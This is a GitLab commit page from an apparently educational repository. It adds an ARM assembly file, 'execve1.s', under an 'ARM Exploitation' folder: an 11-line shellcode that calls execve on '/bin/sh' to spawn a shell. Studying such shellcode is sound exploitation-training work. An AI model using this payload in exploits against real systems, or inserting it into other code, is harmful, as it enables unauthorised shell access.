Toggle navigation
Toggle navigation
This project
Loading...
Sign in
손지언
/
2019102185
Go to a project
Toggle navigation
Toggle navigation pinning
Projects
Groups
Snippets
Help
Project
Activity
Repository
Graphs
Network
Create a new issue
Commits
Issue Boards
Authored by
손지언
2022-02-11 16:57:16 +0900
Browse Files
Options
Browse Files
Download
Email Patches
Plain Diff
Commit
3b3bd9122829973f99eab88ae606dd175d203648
3b3bd912
1 parent
e5e9646f
arm exploit
Hide whitespace changes
Inline
Side-by-side
Showing
1 changed file
with
11 additions
and
0 deletions
ARM Exploitation/execve1.s
ARM Exploitation/execve1.s
0 → 100644
View file @
3b3bd91
.section .text
.global _start
_start:
add r0, pc, #12
mov r1, #0
mov r2, #0
mov r7, #11
svc #0
.ascii "/bin/sh\0"
\ No newline at end of file
Please
register
or
login
to post a comment